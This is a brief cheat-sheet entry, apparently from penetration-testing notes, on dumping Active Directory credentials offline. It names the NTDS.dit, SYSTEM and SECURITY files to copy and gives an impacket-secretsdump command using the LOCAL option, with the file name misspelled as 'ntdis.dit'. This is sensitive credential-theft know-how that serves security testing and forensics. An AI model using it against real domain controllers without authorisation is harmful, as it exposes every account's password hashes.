CRD - Dumping ntds.dit
1.0 Offline dump
1.1 Copy needed files
You’ll need some files to dump the credentials:
- %windir%\NTDS\NTDS.dit
- %windir%\System32\config\SYSTEM
- %windir%\System32\config\SECURITY (not sure if really needed)
Copy these files locally.
1.2 impacket-secretsdump
ATTENTION
Due there is no target, you have to attach LOCAL in your command. Otherwise you will get an error!
impacket-secretsdump -ntds ntdis.dit -system SYSTEM -security SECURITY LOCAL